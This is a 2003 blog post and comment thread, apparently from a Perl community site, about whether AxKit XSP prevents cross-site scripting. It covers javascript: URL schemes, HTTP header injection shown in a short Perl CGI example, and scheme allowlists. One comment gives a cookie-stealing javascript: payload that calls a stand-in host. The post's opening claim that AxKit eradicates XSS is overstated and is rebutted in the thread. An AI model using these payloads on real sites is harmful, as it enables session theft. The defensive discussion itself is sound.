Reason for AxKit

Matts on 2003-01-24T10:12:50

I keep forgetting to mention this, but I want to make sure I write it down *somewhere*...

One of the best reasons for developing a site in AxKit XSP is that it totally eradicates XSS bugs. No need to check what you output - it doesn't matter - there's no way to bypass the strict output checking that XML gives you.

This is all TRACE not withstanding ;-)

The other thing I found out about TRACE is that it totally bypasses any Apache handler installed (mod_perl or otherwise). This seems like a bug to me - if I could handle TRACE in axkit I could disable it very easily. Bah.


I hate to be pessimistic but ...

IlyaM on 2003-01-25T13:06:53

Do I get it right that with AxKit it is impossible to inject new tags into output? If yes, then it makes making XSS holes much harder but not impossible cause XSS it is not just injection of dangerous tags into output. Imagine for example public web service that let's people to exchange URL's (let's call it "Shared bookmarks"). Obvious possible XSS hole is not verifying schema part of submited URL to be clear from dangerous schemas like 'javascript'. I doubt AxKit can automatically protect from this kind of programming errors.

Re:I hate to be pessimistic but ...

Matts on 2003-01-25T17:57:11

You're absolutely right, and I'm no security expert, so just how much damage can you do with the javascript: scheme? Is it limited to one function call, or can you chain lots of javascript into one method.

Re:I hate to be pessimistic but ...

IlyaM on 2003-01-25T20:52:52

At least with Mozilla you can chain several function calls. BTW there are other types of XSS attacks which as I understand AxKit cannot protect from. Like arbitrary user input passed into response HTTP headers.

Re:I hate to be pessimistic but ...

Matts on 2003-01-25T21:21:44

arbitrary user input passed into response HTTP headers.

Mind explaining how this works? I still don't know enough about XSS, but it's a technique that has fascinated me ever since I watched Jeffrey Baker demo it at the Open Source Conference 2.5 years ago.

Re:I hate to be pessimistic but ...

IlyaM on 2003-01-26T09:12:47

Take this perl CGI for example:
my $cgi = CGI->new;
# print headers
print "Content-type: text/html\n";
print "Set-Cookie: cookie=" . $cgi->param('cookie') . "\n";
print "\n";
# print content
print "<html>.....</html>";
Attacker can pass as value of "cookie" parameter something like "\n\n<javascript>....</javascript>" so this CGI ends up printing:
Content-type: text/html
Set-Cookie: cookie=

<javascript>...</javascript>

<html>.....</html&g t;
See? Since arbitrary user input is allowed in headers attacker can actually pass bad html into content body. Though in mod_perl world you would use Apache's API to output HTTP headers and I'm not sure it will work there (it may not pass "\n" - I never tested it).

Re:I hate to be pessimistic but ...

Matts on 2003-01-26T10:17:54

That's not possible with AxKit. You can only add headers with $r->headers_out->add() or the Cookie taglib (which uses headers_out underneath). Creating cookies with the cookie taglib automatically encodes and decodes them.

Re:I hate to be pessimistic but ...

Matts on 2003-01-26T10:40:25

Ah, wait a minute. $r->headers_out->add() is vulnerable to this problem.

Most interesting.

Re:I hate to be pessimistic but ...

darobin on 2003-01-27T11:51:52

I don't think it's limited to one call, but even if it is you always have Good Ol' eval() there so it don't make much of a diff I'm afraid.

Re:I hate to be pessimistic but ...

Matts on 2003-01-27T12:26:59

OK, so given any link you have to check it starts with /^(https?|ftp):/. Sounds fairly straightforward (though I don't do any checking in the AxKit wiki I don't think).

Still, I think overall that means you've got a lot less coding to do with AxKit than with other (inferior ;-) solutions.

Re:I hate to be pessimistic but ...

darobin on 2003-01-27T13:39:10

AxKit has the pro re XSS that it will be more likely to blow up given some treacherous charset than other solutions will be, especially if you charconv from UTF-8 to Latin-X at the end. Apart from that, it's prolly just as open as anything that deals with user-provided content.

I'm not sure there's much to protecting the Wiki. A Wiki is, by definition, well, XSS enabled :) It pretty much works based on trusting other people. At any rate if you want to protect against javascript URLs, I'd check on !/^\s*javascript\s*:/i rather than on positive matches. It's less secure, but I see more and more people using other "weirder" schemes such as nntp, tel, irc, telnet, etc... But that's just my E0.02.

Re:I hate to be pessimistic but ...

IlyaM on 2003-01-28T09:31:44

I'm not sure there's much to protecting the Wiki

Very, very, very wrong. Security module of client side scripting is that there is single trust zone per one hostname. If you have, say, properly coded ecommerce shop and wiki with XSS bugs sitting on same domain than ecommerce shop is also vulnerable. Attacker needs only to lure ecommerce shop user on part of wiki with XSS bug and, bummer, user's auth coookie is known to "bad" guy.

Re:I hate to be pessimistic but ...

darobin on 2003-01-28T09:53:06

Oh yeah, that I know. I was thinking about axkit.org. And I must say I haven't seen many Wiki that were on the same domain as an e-commerce site, it would be quite dangerous imho. There are so many ways to get JS code to run (URL, cookie-munging, on* event handlers, redirects, script elements...).

Re:I hate to be pessimistic but ...

IlyaM on 2003-01-28T10:12:53

I'd explicitly list "good" schemas and reject all others. Various browsers used to support various dangerous schemas in addition to javascript. For example I recall some versions of MSIE had a bug which allowed to run javascript via about: schema.

Re:I hate to be pessimistic but ...

darobin on 2003-01-28T11:10:06

Depends on what kind of security you want. For axkit.org's Wiki I'd allow everything, including javascript:, so that we can have bookmarklets in there. For a site that has sensitive information I wouldn't use a Wiki.

Re:I hate to be pessimistic but ...

Matts on 2003-01-28T11:58:48

Too late. Pod::SAX now explicitly only allows (https?|ftp|mailto|s?news|nntp).

Javascript is just too dangerous.

There's probably still bugs in the wiki in that it allows XML input, so you may be able to sneak something by that way, but hopefully the XSLT should disallow anything but known tags (and filter attributes sanely).

Re:I hate to be pessimistic but ...

pudge on 2003-01-31T15:37:56

I forget the exact code, but you can do something like javascript:document.open("http://www.example.com/stealcookie.pl?cookie=" + document.cookie). You really need to explicitly check for JavaScript, which also means checking for derivatives like ecmascript:, as well as all the URL-encoded forms (encoding into %xx). IIRC, we URI-unescape it in Slash, then check the scheme against /script$/.

Re:I hate to be pessimistic but ...

Matts on 2003-01-31T16:40:38

Wouldn't it be better to do the "firewall" approach and only allow certain schemes rather than block others?

Re:I hate to be pessimistic but ...

pudge on 2003-01-31T16:52:56

It depends on what you want to do, but perhaps. Slash does this now, only allowing a small set of schemes. But we still have the code excluding javascript: schemes specifically.